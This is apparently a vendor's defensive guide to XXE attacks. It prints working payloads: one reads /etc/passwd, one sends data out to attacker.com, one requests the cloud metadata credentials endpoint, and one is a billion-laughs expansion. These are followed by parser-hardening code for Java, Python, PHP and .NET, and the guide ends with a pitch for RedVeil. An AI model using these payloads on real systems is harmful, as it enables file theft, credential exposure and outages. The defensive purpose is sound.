Defending Against XML External Entity Attacks

XML External Entity injection exploits dangerous XML parser configurations to read files, perform SSRF, and in some cases achieve remote code execution.

Introduction

Your application accepts XML uploads for data import: product catalogs, configuration files, or API requests. The parser uses default settings, which seems reasonable until an attacker submits XML containing an external entity reference to /etc/passwd. Suddenly, the contents of that file appear in error messages, and the attacker moves on to configuration files containing database credentials.

XML External Entity (XXE) injection exploits XML parsers configured to process external entities—references to external resources that the parser resolves during document processing. When parsers follow these references, attackers can read local files, make requests to internal systems (SSRF), or cause denial of service. This guide explores XXE attacks and language-specific prevention techniques.

Understanding the Risk

XXE vulnerabilities exist because XML, by specification, supports powerful features that most applications don't need. External entities allow XML documents to reference and include external resources.

Basic XXE Attack: Reading local files through entity expansion:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <name>&xxe;</name>
</userInfo>

When the parser processes &xxe;, it reads /etc/passwd and substitutes the contents into the document. If the application reflects this data in responses or error messages, the attacker retrieves the file.
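
To make the declaration visible without triggering it, the following minimal sketch uses Python's standard-library expat bindings to list the entities a document declares. The names list_entity_declarations and BASIC_XXE are hypothetical, chosen for illustration. Expat does not fetch external entities unless a handler is installed for them, so nothing is read from disk here.

```python
import xml.parsers.expat

# The basic payload from above, as bytes.
BASIC_XXE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <name>&xxe;</name>
</userInfo>
"""


def list_entity_declarations(xml_bytes):
    """Return the entities a document declares, without resolving any of them."""
    declared = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        declared.append({
            "name": name,
            "parameter": bool(is_parameter),
            "system_id": system_id,  # None for internal entities
        })

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return declared


if __name__ == "__main__":
    for entity in list_entity_declarations(BASIC_XXE):
        print(entity)
```

A non-empty system_id in the result marks an external entity, which is the construct a hardened parser should refuse or ignore.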

Blind XXE via Out-of-Band Exfiltration: When responses aren't visible, attackers use external connections:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

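The payload loads a second DTD from the attacker's server. That DTD typically defines the send entity with a URL that embeds the value of %file;, so when the parser resolves &send; it requests a URL on the attacker's server that carries the file contents.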

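XXE to SSRF: Because the parser fetches whatever URL the entity names, XXE can reach services that are only visible from inside the network. The example below targets the link-local metadata address used by AWS and other cloud providers: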

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<request>&xxe;</request>

Denial of Service (Billion Laughs): Exponential entity expansion:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>

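Each level multiplies the size of the expansion by ten. The shortened example above yields only 100 copies of "lol", but real payloads continue the pattern for nine or ten levels, producing billions of copies from a document under a kilobyte and exhausting memory.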
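
The growth is easy to check with a little arithmetic. This sketch assumes every level references the previous one the same number of times. The function name expanded_size is hypothetical.

```python
def expanded_size(base_len: int, fanout: int, levels: int) -> int:
    """Characters produced when the top-level entity is fully expanded.

    base_len: length of the innermost entity's text
    fanout:   references to the previous entity at each level
    levels:   number of nested entity layers above the innermost one
    """
    return base_len * fanout ** levels


if __name__ == "__main__":
    # The example above: "lol" (3 chars), 10 references per level,
    # two nested levels (lol2 and lol3).
    print(expanded_size(3, 10, 2))  # 300
    # The same pattern carried to nine nested levels.
    print(expanded_size(3, 10, 9))  # 3000000000
```

At nine levels the expanded text is about 3 GB, which is why parsers need either entity expansion limits or DTDs disabled outright.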

Prevention Best Practices

Java Prevention

Java's XML parsers require explicit disabling of multiple features:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
 
// Disable DTDs entirely
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
 
// Disable external entities
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
 
// Disable external DTDs
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
 
// Disable XInclude processing
factory.setXIncludeAware(false);
 
// Do not expand entity references into the DOM tree
factory.setExpandEntityReferences(false);

Python Prevention

Use the defusedxml library for safe parsing:

# Using defusedxml (recommended)
import defusedxml.ElementTree as ET
 
def parse_xml_safely(xml_string):
    return ET.fromstring(xml_string)
 
# If using lxml
from lxml import etree
 
def parse_with_lxml(xml_string):
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False
    )
    return etree.fromstring(xml_string.encode(), parser)

Install defusedxml:

pip install defusedxml

PHP Prevention

<?php
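// Needed only on PHP < 8.0 built against libxml2 < 2.9.0;
// the function is deprecated from PHP 8.0 onward.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}
 
function parseXmlSafely($xmlString) {
    $dom = new DOMDocument();
    $dom->substituteEntities = false;
    $dom->resolveExternals = false;
    
    // LIBXML_NOENT would turn entity substitution ON, so it must not be passed.
    // LIBXML_NONET forbids network access while loading.
    $dom->loadXML($xmlString, LIBXML_NONET);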
    
    return $dom;
}
?>

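Note: libxml_disable_entity_loader() is deprecated as of PHP 8.0. With libxml2 2.9.0 and later, external entity loading is disabled by default unless the code opts back in with LIBXML_NOENT, so never pass that flag when parsing untrusted input.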

.NET Prevention

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
 
// The document itself should not resolve external resources either
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null;
 
using (StringReader stringReader = new StringReader(xmlContent))
using (XmlReader reader = XmlReader.Create(stringReader, settings))
{
    doc.Load(reader);
}

Input Validation

Reject XML with DOCTYPE declarations as an additional layer:

def reject_dtd(xml_string):
    # Coarse pre-filter; it complements parser hardening and does not replace it
    upper = xml_string.upper()
    if '<!DOCTYPE' in upper or '<!ENTITY' in upper:
        raise ValueError("DOCTYPE and ENTITY declarations are not allowed")
    return xml_string
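
A substring check is easy to get wrong when input arrives as raw bytes, for example in UTF-16. One alternative, sketched here under the assumption that input arrives as bytes, is to let a real parser detect the DOCTYPE and abort. This uses Python's standard-library expat bindings. DoctypeForbidden and assert_no_doctype are hypothetical names.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration (hypothetical name)."""


def assert_no_doctype(xml_bytes: bytes) -> None:
    """Parse the input and raise DoctypeForbidden if it declares a DOCTYPE.

    Malformed XML raises xml.parsers.expat.ExpatError instead.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside the handler aborts parsing; the exception
        # propagates out of parser.Parse().
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


if __name__ == "__main__":
    assert_no_doctype(b"<order><id>42</id></order>")  # passes silently
    try:
        assert_no_doctype(b'<!DOCTYPE foo [<!ENTITY x "y">]><foo>&x;</foo>')
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

Because the parser handles encoding detection, the check does not depend on how the bytes are encoded. It remains an additional layer, not a substitute for configuring the parser that does the real work.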

Consider JSON Alternatives

If your API doesn't need XML-specific features, accepting JSON instead removes the XXE attack surface for that endpoint, because JSON has no DTD or entity mechanism.

Why Traditional Pentesting Falls Short

XXE vulnerabilities lurk in unexpected XML processing points—file uploads, SOAP endpoints, SVG handlers, Office document parsers, and configuration importers. Manual testers may check obvious XML inputs but miss edge cases where XML is processed indirectly.

Different parser libraries and versions have different default behaviors, requiring testers to understand the specific technology stack. Blind XXE exploitation requires out-of-band techniques that are time-consuming to set up and verify.

How AI-Powered Testing Solves It

RedVeil's AI agents identify XML processing points across your application, including file uploads, API endpoints, and indirect XML handling. The platform tests with various XXE payloads tailored to common parser configurations and frameworks.

When XXE vulnerabilities are detected, RedVeil demonstrates exploitability—whether through direct response disclosure or out-of-band exfiltration. The findings include specific parser configurations that need remediation and language-appropriate fixes.

Conclusion

XML External Entity injection exploits powerful XML features that most applications don't need. The vulnerability persists because XML parsers often enable dangerous features by default, and developers may not realize their application processes XML.

Effective defense requires disabling DTDs and external entities at the parser level. Language-specific configurations vary, but the principle is consistent: explicitly disable features you don't use. For applications that don't require XML's advanced features, consider JSON as a simpler, safer alternative.

AI-powered penetration testing from RedVeil identifies XXE vulnerabilities across your application's XML processing points, validating that parser configurations are secure.

Protect your applications from XXE attacks—test with RedVeil today.
